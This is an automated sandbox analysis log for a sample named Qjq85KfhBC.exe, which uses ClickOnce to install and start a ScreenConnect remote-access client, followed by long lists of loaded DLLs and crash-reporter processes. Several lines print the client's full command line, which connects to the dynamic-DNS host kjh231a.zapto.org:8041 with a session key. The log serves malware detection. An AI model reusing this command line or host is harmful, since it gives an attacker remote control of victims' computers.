                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCommand line argument: dfshim0_2_00911000
                  Source: Qjq85KfhBC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Qjq85KfhBC.exeReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Users\user\Desktop\Qjq85KfhBC.exe "C:\Users\user\Desktop\Qjq85KfhBC.exe"
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "bd7f42b5-0144-4d3f-871e-9605118ce260" "User"
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "bd7f42b5-0144-4d3f-871e-9605118ce260" "User"
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
